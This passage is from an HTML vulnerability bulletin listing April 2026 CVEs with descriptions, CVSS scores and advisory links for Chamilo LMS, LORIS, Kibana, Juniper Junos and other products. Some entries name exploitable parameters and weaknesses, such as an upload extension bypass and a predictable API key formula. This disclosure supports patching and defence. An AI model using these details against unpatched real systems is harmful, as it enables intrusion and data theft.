<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32931" target=3D= "_blank" rel=3D"noopener">CVE-2026-32931</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= 863j-h6pf-3xhx" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-863j-h6pf-3xhx</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/8cbe660de267f2b6ed625433bdfcf38= dee8752b4" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/8cbe660de267f2b6ed625433bdfcf38dee8752b4</a><br><a href=3D= "https://github.com/chamilo/chamilo-lms/commit/d5ef5153df3d1b2de112cbeb190c= dd10bea457f3" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo= /chamilo-lms/commit/d5ef5153df3d1b2de112cbeb190cdd10bea457f3</a><br>=C2=A0<=

</tr>

<td class=3D"vendor-product">aces--Loris</td>
<td>LORIS (Longitudinal Online Research and Imaging System) is a self-hoste=
d web application that provides data- and project-management for neuroimagi=
ng research. Prior to 27.0.3 and 28.0.1, a SQL injection has been identifie=
d in some code sections for the MRI feedback popup window of the imaging br= owser. Attackers can use SQL ingestion to access/alter data on the server. = This vulnerability is fixed in 27.0.3 and 28.0.1.</td>
<td>2026-04-08</td>
<td>7.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33350" target=3D= "_blank" rel=3D"noopener">CVE-2026-33350</a></td>

<a href=3D"https://github.com/aces/Loris/security/advisories/GHSA-9r29-6jgc= -3ggh" target=3D"_blank" rel=3D"noopener">https://github.com/aces/Loris/sec= urity/advisories/GHSA-9r29-6jgc-3ggh</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Elastic--Kibana</td>
<td>Incorrect Authorization (CWE-863) in Kibana can lead to information dis= closure via Privilege Abuse (CAPEC-122). A user with limited Fleet privileg=
es can exploit an internal API endpoint to retrieve sensitive configuration=
data, including private keys and authentication tokens, that should only b=
e accessible to users with higher-level settings privileges. The endpoint c= omposes its response by fetching full configuration objects and returning t= hem directly, bypassing the authorization checks enforced by the dedicated = settings APIs.</td>
<td>2026-04-08</td>
<td>7.7</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33461" target=3D= "_blank" rel=3D"noopener">CVE-2026-33461</a></td>

<a href=3D"https://discuss.elastic.co/t/kibana-8-19-14-9-2-8-9-3-3-security= -update-esa-2026-24/385812" target=3D"_blank" rel=3D"noopener">https://disc= uss.elastic.co/t/kibana-8-19-14-9-2-8-9-3-3-security-update-esa-2026-24/385= 812</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">distribution--distribution</td>
<td>Distribution is a toolkit to pack, ship, store, and deliver container c= ontent. Prior to 3.1.0, in pull-through cache mode, distribution discovers = token auth endpoints by parsing WWW-Authenticate challenges returned by the=
configured upstream registry. The realm URL from a bearer challenge is use=
d without validating that it matches the upstream registry host. As a resul=
t, an attacker-controlled upstream (or an attacker with MitM position to th=
e upstream) can cause distribution to send the configured upstream credenti= als via basic auth to an attacker-controlled realm URL. This vulnerability =
is fixed in 3.1.0.</td>
<td>2026-04-06</td>
<td>7.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33540" target=3D= "_blank" rel=3D"noopener">CVE-2026-33540</a></td>

<a href=3D"https://github.com/distribution/distribution/security/advisories= /GHSA-3p65-76g6-3w7r" target=3D"_blank" rel=3D"noopener">https://github.com= /distribution/distribution/security/advisories/GHSA-3p65-76g6-3w7r</a><br>= =C2=A0</td>
</tr>

<td class=3D"vendor-product">themeum--Tutor LMS eLearning and online course=
solution</td>
<td>The Tutor LMS - eLearning and online course solution plugin for WordPre=
ss is vulnerable to an Insecure Direct Object Reference in all versions up = to, and including, 3.9.7. This is due to missing authentication and authori= zation checks in the `pay_incomplete_order()` function. The function accept=
s an attacker-controlled `order_id` parameter and uses it to look up order = data, then writes billing fields to the order owner's profile (`$order_data= -&gt;user_id`) without verifying the requester's identity or ownership. Bec= ause the Tutor nonce (`_tutor_nonce`) is exposed on public frontend pages, = this makes it possible for unauthenticated attackers to overwrite the billi=
ng profile (name, email, phone, address) of any user who has an incomplete = manual order, by sending a crafted POST request with a guessed or enumerate=
d `order_id`.</td>
<td>2026-04-10</td>
<td>7.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-3360" target=3D"= _blank" rel=3D"noopener">CVE-2026-3360</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/7f3655= 19-dd0a-4f39-880d-7216ce2f7d1e?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/7f365519-dd0= a-4f39-880d-7216ce2f7d1e?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/tutor/tags/3.9.7/classes/Tutor.php#L563" target=3D"= _blank" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/tutor/t= ags/3.9.7/classes/Tutor.php#L563</a><br><a href=3D"https://plugins.trac.wor= dpress.org/browser/tutor/tags/3.9.7/ecommerce/CheckoutController.php#L108" = target=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress.org/brows= er/tutor/tags/3.9.7/ecommerce/CheckoutController.php#L108</a><br><a href=3D= "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/ecommerce/Chec= koutController.php#L1059" target=3D"_blank" rel=3D"noopener">https://plugin= s.trac.wordpress.org/browser/tutor/tags/3.9.7/ecommerce/CheckoutController.= php#L1059</a><br><a href=3D"https://plugins.trac.wordpress.org/browser/tuto= r/trunk/ecommerce/CheckoutController.php#L1059" target=3D"_blank" rel=3D"no= opener">https://plugins.trac.wordpress.org/browser/tutor/trunk/ecommerce/Ch= eckoutController.php#L1059</a><br><a href=3D"https://plugins.trac.wordpress= .org/changeset/3496394/tutor/trunk/ecommerce/CheckoutController.php" target= =3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress.org/changeset/3= 496394/tutor/trunk/ecommerce/CheckoutController.php</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0= -RC.3, Chamilo LMS contains an Insecure Direct Object Reference (IDOR) vuln= erability in the Learning Path progress saving endpoint. The file lp_ajax_s= ave_item.php accepts a uid (user ID) parameter directly from $_REQUEST and = uses it to load and modify another user's Learning Path progress - includin=
g score, status, completion, and time - without verifying that the requesti=
ng user matches the target user ID. Any authenticated user enrolled in a co= urse can overwrite another user's Learning Path progress by simply changing=
the uid parameter in the request. This vulnerability is fixed in 1.11.38 a=
nd 2.0.0-RC.3.</td>
<td>2026-04-10</td>
<td>7.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33702" target=3D= "_blank" rel=3D"noopener">CVE-2026-33702</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= 3rv7-9fhx-j654" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-3rv7-9fhx-j654</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/6331d051b4468deb5830c01d1e047c5= e5cf2c74f" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/6331d051b4468deb5830c01d1e047c5e5cf2c74f</a><br><a href=3D= "https://github.com/chamilo/chamilo-lms/commit/bf3f6c6949b5c882b48a9914baa1= 9910417e4551" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo= /chamilo-lms/commit/bf3f6c6949b5c882b48a9914baa19910417e4551</a><br>=C2=A0<=

</tr>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. Prior to 1.11.38, any auth= enticated user (including students) can write arbitrary content to files on=
the server via the BigUpload endpoint. The key parameter controls the file= name and the raw POST body becomes the file content. While .php extensions = are filtered to .phps, the .pht extension passes through unmodified. On Apa= che configurations where .pht is handled as PHP, this leads to Remote Code = Execution. This vulnerability is fixed in 1.11.38.</td>
<td>2026-04-10</td>
<td>7.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33704" target=3D= "_blank" rel=3D"noopener">CVE-2026-33704</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= phfx-pwwg-945v" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-phfx-pwwg-945v</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/9748f1ffbdb8b6dc84c0e0591c9d3c1= d92e21c00" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/9748f1ffbdb8b6dc84c0e0591c9d3c1d92e21c00</a><br>=C2=A0</td=

</tr>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. Prior to 1.11.38, any auth= enticated user with a REST API key can modify their own status field via th=
e update_user_from_username endpoint. A student (status=3D5) can change the=
ir status to Teacher/CourseManager (status=3D1), gaining course creation an=
d management privileges. This vulnerability is fixed in 1.11.38.</td> <td>2026-04-10</td>
<td>7.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33706" target=3D= "_blank" rel=3D"noopener">CVE-2026-33706</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= 3gqc-xr75-pcpw" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-3gqc-xr75-pcpw</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/0acf8a196307c66c049f97f5ff76cf2= 1c4a08127" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/0acf8a196307c66c049f97f5ff76cf21c4a08127</a><br>=C2=A0</td=

</tr>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0= -RC.3, REST API keys are generated using md5(time() + (user_id * 5) - rand(= 10000, 10000)). The rand(10000, 10000) call always returns exactly 10000 (m=
in =3D=3D max), making the formula effectively md5(timestamp + user_id*5 - = 10000). An attacker who knows a username and approximate key creation time = can brute-force the API key. This vulnerability is fixed in 1.11.38 and 2.0= .0-RC.3.</td>
<td>2026-04-10</td>
<td>7.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33710" target=3D= "_blank" rel=3D"noopener">CVE-2026-33710</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= rpmg-j327-mr39" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-rpmg-j327-mr39</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/4448701bb8ec557e94ef02d19c72cbe= 9c49c2d09" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/4448701bb8ec557e94ef02d19c72cbe9c49c2d09</a><br><a href=3D= "https://github.com/chamilo/chamilo-lms/commit/e7400dd840586ae134b286d0a237= 4f3d269a9a9d" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo= /chamilo-lms/commit/e7400dd840586ae134b286d0a2374f3d269a9a9d</a><br>=C2=A0<=

</tr>

<td class=3D"vendor-product">saleor--saleor</td>
<td>Saleor is an e-commerce platform. From 2.0.0 to before 3.23.0a3, 3.22.4=
7, 3.21.54, and 3.20.118, Saleor supports query batching by submitting mult= iple GraphQL operations in a single HTTP request as a JSON array but wasn't=
enforcing any upper limit on the number of operations. This allowed an una= uthenticated attacker to send a single HTTP request many operations (bypass= ing the per query complexity limit) to exhaust resources. This vulnerabilit=
y is fixed in 3.23.0a3, 3.22.47, 3.21.54, and 3.20.118.</td> <td>2026-04-08</td>
<td>7.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33756" target=3D= "_blank" rel=3D"noopener">CVE-2026-33756</a></td>

<a href=3D"https://github.com/saleor/saleor/security/advisories/GHSA-24jw-f= 244-qfpp" target=3D"_blank" rel=3D"noopener">https://github.com/saleor/sale= or/security/advisories/GHSA-24jw-f244-qfpp</a><br><a href=3D"https://github= .com/saleor/saleor/commit/7be352fa8c35875d6e66d36493ca7c14c101bd64" target= =3D"_blank" rel=3D"noopener">https://github.com/saleor/saleor/commit/7be352= fa8c35875d6e66d36493ca7c14c101bd64</a><br><a href=3D"https://github.com/sal= eor/saleor/commit/cdb66da97abb7c86939e384914cd8d9194f378e8" target=3D"_blan=
k" rel=3D"noopener">https://github.com/saleor/saleor/commit/cdb66da97abb7c8= 6939e384914cd8d9194f378e8</a><br><a href=3D"https://github.com/saleor/saleo= r/commit/d6a94e95bd77f3f733fa66afd1b1ac72e863ca2a" target=3D"_blank" rel=3D= "noopener">https://github.com/saleor/saleor/commit/d6a94e95bd77f3f733fa66af= d1b1ac72e863ca2a</a><br><a href=3D"https://github.com/saleor/saleor/commit/= e42aa4d6e588982e78942b033af051c8ec8f43fa" target=3D"_blank" rel=3D"noopener= ">https://github.com/saleor/saleor/commit/e42aa4d6e588982e78942b033af051c8e= c8f43fa</a><br><a href=3D"https://github.com/saleor/saleor/commit/f0371bdd4= cafcc841f1a9e7049cead6133bf7464" target=3D"_blank" rel=3D"noopener">https:/= /github.com/saleor/saleor/commit/f0371bdd4cafcc841f1a9e7049cead6133bf7464</= a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--CTP OS</td>
<td>A Weak Password Requirements vulnerability in the password management f= unction of Juniper Networks CTP OS might allow an unauthenticated, network-= based attacker to exploit weak passwords of local accounts and potentially = take full control of the device. The password management menu enables the a= dministrator to set password complexity requirements, but these settings ar=
e not saved. The issue can be verified with the menu option "Show password = requirements". Failure to enforce the intended requirements can lead to wea=
k passwords being used, which significantly increases the likelihood that a=
n attacker can guess these and subsequently attain unauthorized access. Thi=
s issue affects CTP OS versions 9.2R1 and 9.2R2.</td>
<td>2026-04-09</td>
<td>7.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33771" target=3D= "_blank" rel=3D"noopener">CVE-2026-33771</a></td>

<a href=3D"https://kb.juniper.net/JSA107864" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA107864</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--Junos OS</td>
<td>An Improper Validation of Syntactic Correctness of Input vulnerability =
in the IPsec library used by kmd and iked of Juniper Networks Junos OS on S=
RX Series and MX Series allows an unauthenticated, network-based attacker t=
o cause a complete Denial-of-Service (DoS). If an affected device receives =
a specifically malformed first ISAKMP packet from the initiator, the kmd/ik=
ed process will crash and restart, which momentarily prevents new security = associations (SAs) for from being established. Repeated exploitation of thi=
s vulnerability causes a complete inability to establish new VPN connection=
s. This issue affects Junos OS on SRX Series and MX Series: * all versions = before 22.4R3-S9, * 23.2 version before 23.2R2-S6, * 23.4 version before 23= .4R2-S7, * 24.2 versions before 24.2R2-S4, * 24.4 versions before 24.4R2-S3=
, * 25.2 versions before 25.2R1-S2, 25.2R2.</td>
<td>2026-04-09</td>
<td>7.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33778" target=3D= "_blank" rel=3D"noopener">CVE-2026-33778</a></td>

<a href=3D"https://kb.juniper.net/JSA107868" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA107868</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--Junos OS Evolved</td>
<td>A Missing Authentication for Critical Function vulnerability in the Fle= xible PIC Concentrators (FPCs) of Juniper Networks Junos OS Evolved on PTX = Series allows a local, authenticated attacker with low privileges to gain d= irect access to FPCs installed in the device. A local user with low privile= ges can gain direct access to the installed FPCs as a high privileged user,=
which can potentially lead to a full compromise of the affected component.=
This issue affects=C2=A0Junos OS Evolved on PTX10004, PTX10008, PTX100016,=
with JNP10K-LC1201 or JNP10K-LC1202: * All versions before 21.2R3-S8-EVO, =
* 21.4-EVO versions before 21.4R3-S7-EVO, * 22.2-EVO versions before 22.2R3= -S4-EVO, * 22.3-EVO versions before 22.3R3-S3-EVO, * 22.4-EVO versions befo=
re 22.4R3-S2-EVO, * 23.2-EVO versions before 23.2R2-EVO.</td> <td>2026-04-09</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33788" target=3D= "_blank" rel=3D"noopener">CVE-2026-33788</a></td>

<a href=3D"https://kb.juniper.net/JSA107806" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA107806</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--Junos OS</td>
<td>An Improper Check for Unusual or Exceptional Conditions vulnerability i=
n the flow daemon (flowd) of Juniper Networks Junos OS on SRX Series allows=
an attacker sending a specific, malformed ICMPv6 packet to cause the srxpf=
e process to crash and restart.=C2=A0Continued receipt and processing of th= ese packets will repeatedly crash the srxpfe process and sustain the Denial=
of Service (DoS) condition. During NAT64 translation, receipt of a specifi=
c, malformed ICMPv6 packet destined to the device will cause the srxpfe pro= cess to crash and restart. This issue cannot be triggered using IPv4 nor ot= her IPv6 traffic. This issue affects Junos OS on SRX Series: * all versions=
before 21.2R3-S10, * all versions of 21.3, * from 21.4 before 21.4R3-S12, =
* all versions of 22.1, * from 22.2 before 22.2R3-S8, * all versions of 22.=
4, * from 22.4 before 22.4R3-S9, * from 23.2 before 23.2R2-S6, * from 23.4 = before 23.4R2-S7, * from 24.2 before 24.2R2-S3, * from 24.4 before 24.4R2-S=
3, * from 25.2 before 25.2R1-S2, 25.2R2.</td>
<td>2026-04-09</td>
<td>7.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33790" target=3D= "_blank" rel=3D"noopener">CVE-2026-33790</a></td>

<a href=3D"https://kb.juniper.net/JSA107874" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA107874</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--Junos OS</td>
<td>An Execution with Unnecessary Privileges vulnerability=C2=A0in the User=
Interface (UI) of Juniper Networks Junos OS and Junos OS Evolved allows a = local, low-privileged attacker to gain root privileges, thus compromising t=
he system. When a=C2=A0configuration that allows unsigned Python op scripts=
is present on the device, a non-root user is able to execute malicious op = scripts as a root-equivalent user, leading to privilege escalation.=C2=A0 T= his issue affects Junos OS:=C2=A0 * All versions before 22.4R3-S7,=C2=A0 * = from 23.2 before 23.2R2-S4,=C2=A0 * from 23.4 before=C2=A023.4R2-S6, * from=
24.2 before 24.2R1-S2, 24.2R2,=C2=A0 * from 24.4 before 24.4R1-S2, 24.4R2;= =C2=A0 Junos OS Evolved:=C2=A0 * All versions before 22.4R3-S7-EVO,=C2=A0 *=
from 23.2 before 23.2R2-S4-EVO,=C2=A0 * from 23.4 before=C2=A023.4R2-S6-EV=
O, * from 24.2 before 24.2R2-EVO,=C2=A0 * from 24.4 before 24.4R1-S1-EVO, 2= 4.4R2-EVO.</td>
<td>2026-04-09</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33793" target=3D= "_blank" rel=3D"noopener">CVE-2026-33793</a></td>

<a href=3D"https://kb.juniper.net/JSA103142" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA103142</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--Junos OS</td>
<td>An Improper Input Validation vulnerability in Juniper Networks Junos OS=
and Junos OS Evolved allows an unauthenticated, adjacent attacker, sending=
a specific genuine BGP packet in an already established BGP session to res=
et only that session causing a Denial of Service (DoS). An attacker repeate= dly sending the packet will sustain the Denial of Service (DoS).This issue = affects Junos OS: * 25.2 versions before 25.2R2 This issue doesn't not affe= cted Junos OS versions before 25.2R1. This issue affects Junos OS Evolved: =
* 25.2-EVO versions before 25.2R2-EVO This issue doesn't not affected Junos=
OS Evolved versions before 25.2R1-EVO. eBGP and iBGP are affected. IPv4 an=
d IPv6 are affected.</td>
<td>2026-04-09</td>
<td>7.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33797" target=3D= "_blank" rel=3D"noopener">CVE-2026-33797</a></td>

<a href=3D"https://kb.juniper.net/JSA107850" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA107850</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">shamimmoeen--WCAPF Ajax Product Filter for Woo= Commerce</td>
<td>WCAPF - WooCommerce Ajax Product Filter plugin is vulnerable to time-ba= sed SQL Injection via the 'post-author' parameter in all versions up to, an=
d including, 4.2.3 due to insufficient escaping on the user supplied parame= ter and lack of sufficient preparation on the existing SQL query. This make=
s it possible for unauthenticated attackers to append additional SQL querie=
s into already existing queries that can be used to extract sensitive infor= mation from the database.</td>
<td>2026-04-08</td>
<td>7.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-3396" target=3D"= _blank" rel=3D"noopener">CVE-2026-3396</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/ee0a76= 2e-9159-4dab-a7be-9cbe332effb1?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/ee0a762e-915= 9-4dab-a7be-9cbe332effb1?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-p= roduct-filter.php#L739" target=3D"_blank" rel=3D"noopener">https://plugins.= trac.wordpress.org/browser/wc-ajax-product-filter/trunk/includes/class-wcap= f-product-filter.php#L739</a><br><a href=3D"https://plugins.trac.wordpress.= org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-product-filte= r.php#L689" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpre= ss.org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-product-fi= lter.php#L689</a><br><a href=3D"https://plugins.trac.wordpress.org/browser/= wc-ajax-product-filter/trunk/includes/class-wcapf-product-filter.php#L81" t= arget=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress.org/browse= r/wc-ajax-product-filter/trunk/includes/class-wcapf-product-filter.php#L81<= /a><br><a href=3D"https://plugins.trac.wordpress.org/browser/wc-ajax-produc= t-filter/trunk/includes/class-wcapf-product-filter.php#L65" target=3D"_blan=
k" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/wc-ajax-prod= uct-filter/trunk/includes/class-wcapf-product-filter.php#L65</a><br><a href= =3D"https://plugins.trac.wordpress.org/changeset/3484080/" target=3D"_blank=
" rel=3D"noopener">https://plugins.trac.wordpress.org/changeset/3484080/</a= ><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">@fedify--fedify</td>
<td>Fedify is a TypeScript library for building federated server apps power=
ed by ActivityPub. Prior to 1.9.6, 1.10.5, 2.0.8, and 2.1.1, @fedify/fedify=
follows HTTP redirects recursively in its remote document loader and authe= nticated document loader without enforcing a maximum redirect count or visi= ted-URL loop detection. An attacker who controls a remote ActivityPub key o=
r actor URL can force a server using Fedify to make repeated outbound reque= sts from a single inbound request, leading to resource consumption and deni=
al of service. This vulnerability is fixed in 1.9.6, 1.10.5, 2.0.8, and 2.1= .1.</td>
<td>2026-04-06</td>
<td>7.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34148" target=3D= "_blank" rel=3D"noopener">CVE-2026-34148</a></td>

<a href=3D"https://github.com/fedify-dev/fedify/security/advisories/GHSA-gm= 9m-gwc4-hwgp" target=3D"_blank" rel=3D"noopener">https://github.com/fedify-= dev/fedify/security/advisories/GHSA-gm9m-gwc4-hwgp</a><br><a href=3D"https:= //github.com/fedify-dev/fedify/releases/tag/1.10.5" target=3D"_blank" rel= =3D"noopener">https://github.com/fedify-dev/fedify/releases/tag/1.10.5</a><= br><a href=3D"https://github.com/fedify-dev/fedify/releases/tag/1.9.6" targ= et=3D"_blank" rel=3D"noopener">https://github.com/fedify-dev/fedify/release= s/tag/1.9.6</a><br><a href=3D"https://github.com/fedify-dev/fedify/releases= /tag/2.0.8" target=3D"_blank" rel=3D"noopener">https://github.com/fedify-de= v/fedify/releases/tag/2.0.8</a><br><a href=3D"https://github.com/fedify-dev= /fedify/releases/tag/2.1.1" target=3D"_blank" rel=3D"noopener">https://gith= ub.com/fedify-dev/fedify/releases/tag/2.1.1</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">AcademySoftwareFoundation--openexr</td> <td>OpenEXR provides the specification and reference implementation of the = EXR file format, an image storage format for the motion picture industry. F= rom 3.2.0 to before 3.2.7, 3.3.9, and 3.4.9, a misaligned memory write vuln= erability exists in LossyDctDecoder_execute() in src/lib/OpenEXRCore/intern= al_dwa_decoder.h:749. When decoding a DWA or DWAB-compressed EXR file conta= ining a FLOAT-type channel, the decoder performs an in-place HALF=E2=86=92F= LOAT conversion by casting an unaligned uint8_t * row pointer to float * an=
d writing through it. Because the row buffer may not be 4-byte aligned, thi=
s constitutes undefined behavior under the C standard and crashes immediate=
ly on architectures that enforce alignment (ARM, RISC-V, etc.). On x86 it i=
s silently tolerated at runtime but remains exploitable via compiler optimi= zations that assume aligned access. This vulnerability is fixed in 3.2.7, 3= .3.9, and 3.4.9.</td>
<td>2026-04-06</td>
<td>7.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34379" target=3D= "_blank" rel=3D"noopener">CVE-2026-34379</a></td>

<a href=3D"https://github.com/AcademySoftwareFoundation/openexr/security/ad= visories/GHSA-w88v-vqhq-5p24" target=3D"_blank" rel=3D"noopener">https://gi= thub.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-w88v-vq= hq-5p24</a><br><a href=3D"https://github.com/AcademySoftwareFoundation/open= exr/releases/tag/v3.2.7" target=3D"_blank" rel=3D"noopener">https://github.= com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7</a><br><a href=3D= "https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9" = target=3D"_blank" rel=3D"noopener">https://github.com/AcademySoftwareFounda= tion/openexr/releases/tag/v3.3.9</a><br><a href=3D"https://github.com/Acade= mySoftwareFoundation/openexr/releases/tag/v3.4.9" target=3D"_blank" rel=3D"= noopener">https://github.com/AcademySoftwareFoundation/openexr/releases/tag= /v3.4.9</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">aces--Loris</td>
<td>LORIS (Longitudinal Online Research and Imaging System) is a self-hoste=
d web application that provides data- and project-management for neuroimagi=
ng research. From 20.0.0 to before 27.0.3 and 28.0.1, a bug in the static f= ile router can allow an attacker to traverse outside of the intended direct= ory, allowing unintended files to be downloaded through the static, css, an=
d js endpoints. This vulnerability is fixed in 27.0.3 and 28.0.1.</td> <td>2026-04-08</td>
<td>7.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34392" target=3D= "_blank" rel=3D"noopener">CVE-2026-34392</a></td>

<a href=3D"https://github.com/aces/Loris/security/advisories/GHSA-rfj5-58hv= -wc5f" target=3D"_blank" rel=3D"noopener">https://github.com/aces/Loris/sec= urity/advisories/GHSA-rfj5-58hv-wc5f</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">go-vikunja--vikunja</td>
<td>Vikunja is an open-source self-hosted task management platform. Prior t=
o 2.3.0, the OIDC callback handler issues a full JWT token without checking=
whether the matched user has TOTP two-factor authentication enabled. When =
a local user with TOTP enrolled is matched via the OIDC email fallback mech= anism, the second factor is completely skipped. This vulnerability is fixed=
in 2.3.0.</td>
<td>2026-04-10</td>
<td>7.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34727" target=3D= "_blank" rel=3D"noopener">CVE-2026-34727</a></td>

<a href=3D"https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8= jvc-mcx6-r4cg" target=3D"_blank" rel=3D"noopener">https://github.com/go-vik= unja/vikunja/security/advisories/GHSA-8jvc-mcx6-r4cg</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">HDFGroup--hdf5</td>
<td>HDF5 is software for managing data. In 1.14.1-2 and earlier, a heap-use= -after-free was found in the h5dump helper utility. An attacker who can sup= ply a malicious h5 file can trigger a heap use-after-free. The freed object=
is referenced in a memmove call from H5T__conv_struct. The original object=
was allocated by H5D__typeinfo_init_phase3 and freed by H5D__typeinfo_term= .</td>
<td>2026-04-09</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34734" target=3D= "_blank" rel=3D"noopener">CVE-2026-34734</a></td>

<a href=3D"https://github.com/HDFGroup/hdf5/security/advisories/GHSA-w7v2-9= cmr-pwwj" target=3D"_blank" rel=3D"noopener">https://github.com/HDFGroup/hd= f5/security/advisories/GHSA-w7v2-9cmr-pwwj</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Analytify--Under Construction, Coming Soon &am=
p; Maintenance Mode</td>
<td>Cross-Site Request Forgery (CSRF) vulnerability in Analytify Under Cons= truction, Coming Soon &amp; Maintenance Mode allows Cross Site Request Forg= ery.This issue affects Under Construction, Coming Soon &amp; Maintenance Mo= de: from n/a through 2.1.1.</td>
<td>2026-04-07</td>
<td>7.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34896" target=3D= "_blank" rel=3D"noopener">CVE-2026-34896</a></td>

